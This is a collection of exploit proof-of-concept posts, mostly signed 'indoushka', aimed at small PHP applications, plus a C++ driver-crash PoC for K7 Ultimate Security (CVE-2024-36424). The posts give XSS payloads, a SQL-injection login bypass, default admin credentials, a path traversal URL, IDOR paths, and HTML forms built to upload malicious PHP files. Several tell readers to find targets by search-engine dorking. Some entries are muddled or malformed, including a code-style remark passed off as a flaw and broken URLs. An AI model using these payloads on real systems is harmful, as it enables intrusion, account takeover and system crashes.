<pre><code>=============================================================================================================================================<br />| # Title : Covid-19 Contact Tracing System 1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/cts_qr_1.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /cts_qr/admin/?page=system_info'%22()%26%25<acx><ScRiPt%20>prompt(901045)</ScRiPt><br /><br />[+] http://localhost/cts_qr/admin/?page=system_info%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(901045)%3C/ScRiPt%3E<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Car Rental Management System 1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/car-rental-management-system.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] USe Payload : /car_rental/index.php?id=&page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg<br /><br />[+] http://127.0.0.1/car_rental/index.php?id=&page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : BloodBank 1.1 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://demo.phpscriptpoint.com/bloodbank/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin@gmail.com & pass = 1234<br /><br />[+] https://www/127.0.0.1/demo/phpscriptpointcom/bloodbank/admin<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Bhojon restaurant management system v2.9 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.bdtask.com/restaurant-management-system.php#live_demo |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin@example.com & pass = 12345<br /><br />[+] https://www/127.0.0.1/somrestocom/dashboard/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : FlatPress 1.3.1 Path Validation Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://github.com/flatpressblog/flatpress/archive/1.3.1.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] infected item : /flatpress-1.3.1/fp-includes/core/core.config.php<br /><br /> if ($fullpath[0] != '/')<br /> trigger_error('config_read: syntax error. Path must begin with a /');<br /> <br />[+] This line checks if the path starts with /. If it doesn’t, it triggers an error using trigger_error. <br /> While this is valid, it might be better to use an InvalidArgumentException for more robust error handling.<br /><br />[+] use payload : /fp-includes/core/core.config.php/path=../../../../../fp-content/users/<br /><br />[+] http://127.0.0.1/flatpress-1.3.1/fp-includes/core/core.config.php/path=../../../../../fp-content/users/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code># Title: K7 Ultimate Security < v17.0.2019 "K7RKScan.sys" Null Pointer Dereference <br /># Date: 13.08.2024<br /># Author: M. Akil Gündoğan <br /># Vendor Homepage: https://k7computing.com/<br /># Version: < v17.0.2019<br /># Tested on: Windows 10 Pro x64<br /># CVE ID: CVE-2024-36424<br /><br /># Vulnerability Description:<br />--------------------------------------<br />In K7 Ultimate Security < v17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the drive is accessible to all users in the "Everyone" group.<br /><br /># Technical details and step by step Proof of Concept's (PoC):<br />--------------------------------------<br />1 - Install the driver in the path "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys" to the system via OSRLoader or sc create.<br /><br />2 - Compile the attached PoC code written in C++ as release on VS 2022. <br /><br />3 - Run the compiled PoC directly with a double click. You will see the system crash/BSOD.<br /><br /># Impact:<br />--------------------------------------<br />An attacker with unauthorized user access can cause the entire system to crash and terminate critical processes, including any antivirus process where the relevant driver is activated and used on the system.<br /><br /># Advisories:<br />--------------------------------------<br />K7 Computing recommends that all customers update their products to the corresponding versions shown below:<br /><br />K7 Ultimate Security (17.0.2019 or Higher)<br /><br /># Timeline:<br />--------------------------------------<br />- 16.05.2024 - Vulnerability reported.<br />- 05.08.2024 - Vendor has fixed the vulnerability.<br />- 13.08.2024 - Released.<br /><br /># References:<br />--------------------------------------<br />- Vendor: https://www.k7computing.com<br />- Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417<br />- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424<br />- Repository: https://github.com/secunnix/CVE-2024-36424<br /><br /># PoC Code (C++):<br />-------------------------------------------------------------------------------------------------------------------------<br /><br />/*<br /># Usage: Only compile it and run, boooom :)<br />*/<br /><br />#include <windows.h><br />#include <iostream><br /><br />const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link path<br />const DWORD ioCTL = 0x222010; // IOCTL 0x222010 or 0x222014<br /><br />int main() {<br /> std::cout << "K7 Ultimae Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl;<br /> HANDLE hDevice = CreateFile(driverDevice.c_str(),<br /> GENERIC_READ | GENERIC_WRITE,<br /> 0,<br /> nullptr,<br /> OPEN_EXISTING,<br /> 0,<br /> nullptr);<br /><br /> if (hDevice == INVALID_HANDLE_VALUE) {<br /> std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl;<br /> return 1;<br /> }<br /><br /> void* inputBuffer = nullptr; // Null input buffer<br /> DWORD inputBufferSize = 0;<br /><br /> DWORD bytesReturned;<br /> BOOL result = DeviceIoControl(hDevice,<br /> ioCTL,<br /> inputBuffer,<br /> inputBufferSize,<br /> nullptr,<br /> 0,<br /> &bytesReturned,<br /> nullptr);<br /><br /> if (!result) {<br /> std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl;<br /> }<br /><br /> CloseHandle(hDevice);<br /><br /> return 0;<br />}<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Kortex v1.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.mayurik.com/source-code/P5339/best-free-law-office-management-software |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] use payload : /control/data-table.php<br /><br />[+] https://www/ahmedshawki2110.freewebhostmost.com/control/data-table.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Job Castle v1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://download-media.code-projects.org/2020/04/Job_Recruitment_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code create a new folder and upload a executable malicious file remotely .<br /><br />[+] Go to the line 10.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : /signup_ac.php.<br /><br />[+] save code as poc.html .<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Job Seeker Registration</title><br /></head><br /><body><br /> <h2>Job Seeker Registration</h2><br /> <form name="jobseeker_registration" action="http://127.0.0.1/Job-Castle-master/signup_ac.php" method="POST" enctype="multipart/form-data"><br /><br /><br /> <label for="file">Upload Resume:</label><br /> <input type="file" id="file" name="file" required><br><br><br /><br /> <button type="submit" name="button2">GO GO GO ...</button><br /> </form><br /></body><br /></html><br /><br />[+] path http://127.0.0.1/Job-Castle-master/uploads/😈.php<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Hotel Management System 1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This HTML page is designed to remotely upload malicious PHP files directly.<br /><br />[+] Line 23 set url of target.<br /><br />[+] The path to upload the files : http://127.0.0.1/hotel/assets/img/<br /><br />[+] Save Code as html :<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Category Management</title><br /></head><br /><body><br /><div class="container-fluid"><br /> <form id="manage-category" enctype="multipart/form-data"><br /> <input type="hidden" name="id"> <br /> <div class="form-group"><br /> <label for="img" class="control-label">Ev!L Image</label><br /> <input type="file" name="img" id="img" class="form-control form-control-sm rounded-0" accept="image/*" onchange="displayImg(this, $(this))"><br /> </div><br /> <button type="submit" class="btn btn-primary">Send</button><br /> </form><br /></div><br /> </tbody><br /> </table><br /></div><br /><br /><script src="https://code.jquery.com/jquery-3.6.0.min.js"></script><br /><script><br /> function displayImg(input, _this) {<br /> if (input.files && input.files[0]) {<br /> var reader = new FileReader();<br /> reader.onload = function (e) {<br /> $('#cimg').attr('src', e.target.result);<br /> }<br /> reader.readAsDataURL(input.files[0]);<br /> }<br /> }<br /><br /> $('#manage-category').submit(function(e){<br /> e.preventDefault();<br /> $.ajax({<br /> url: 'http://127.0.0.1/hotel/admin/ajax.php?action=save_category',<br /> data: new FormData($(this)[0]),<br /> cache: false,<br /> contentType: false,<br /> processData: false,<br /> method: 'POST',<br /> type: 'POST',<br /> success: function(resp){<br /> if (resp == 1) {<br /> alert("Data successfully added");<br /> setTimeout(function(){<br /> location.reload();<br /> }, 1500);<br /> <br /> }<br /> }<br /> });<br /> });<br /><br /> $('.edit_cat').click(function(){<br /> var cat = $('#manage-category');<br /> cat.get(0).reset();<br /> $('#cimg').attr('src', '../assets/img/' + $(this).attr('data-cover_img'));<br /> });<br /><br /></script><br /></body><br /></html><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Covid-19 Contact Tracing System 1.0 auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/cts_qr_1.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user & pass = ' or 0=0 ##<br /><br />[+] http://localhost/cts_qr/admin/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>